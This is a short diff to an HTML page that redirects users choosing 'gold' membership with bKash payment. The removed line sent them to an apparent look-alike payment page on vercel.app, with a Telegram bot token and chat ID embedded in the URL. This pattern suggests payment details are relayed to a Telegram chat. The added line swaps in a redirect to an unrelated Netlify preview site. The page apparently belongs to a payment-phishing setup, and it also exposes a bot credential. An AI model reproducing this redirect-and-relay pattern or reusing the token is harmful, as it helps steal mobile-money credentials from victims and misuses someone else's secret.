--- a/indexx.html
+++ b/indexx.html
@@ -476,7 +476,7 @@ h4 {
 
                 if (membershipType === 'gold' && paymentMethod === 'bKash') {
 
-                    window.location.href = 'https://portwallet.vercel.app/paymentmethod=bkash&&paymentID=1.html?amount=…&botToken=7925320513:AAHD688nFLC4cicGaOhbPYx458vAX8EnD-M&chatId=1347276733';
+                    window.location.href = 'https://678d04e6add4cc14facc3eb2--symphonious-frangollo-e05068.netlify.app/';
 
                 } else if (membershipType === 'platinum' && paymentMethod === 'bKash') {
 
